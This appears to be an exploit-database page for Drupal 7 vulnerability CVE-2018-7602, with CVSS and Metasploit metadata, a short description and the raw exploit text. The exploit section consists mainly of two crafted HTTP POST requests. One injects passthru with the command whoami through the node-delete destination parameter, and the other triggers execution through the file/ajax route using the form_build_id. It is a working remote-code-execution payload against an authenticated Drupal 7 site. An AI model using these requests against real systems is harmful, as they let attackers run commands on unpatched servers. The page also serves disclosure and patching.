Exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602

vendor:

Drupal

by:

Blaklis

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Drupal

Affected Version From: Drupal 7

Affected Version To: Drupal 7

Patch Exists: YES

Related CWE: CVE-2018-7602

CPE: a:drupal:drupal:7

Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-7602/, https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-7602/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-7602/, https://www.rapid7.com/db/vulnerabilities/drupal-cve-2018-7602/

Other Scripts: N/A

Platforms Tested: None

2018

Exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602

This exploit requires authentication and the power of deleting a node. The attacker must send a POST request to the vulnerable form, retrieve the form_build_id from the response, and then send another POST request with the form_build_id to trigger the exploit. This will display the result of the whoami command.

Mitigation:

Patch your systems

Source

Exploit-DB raw data:

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with : 

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis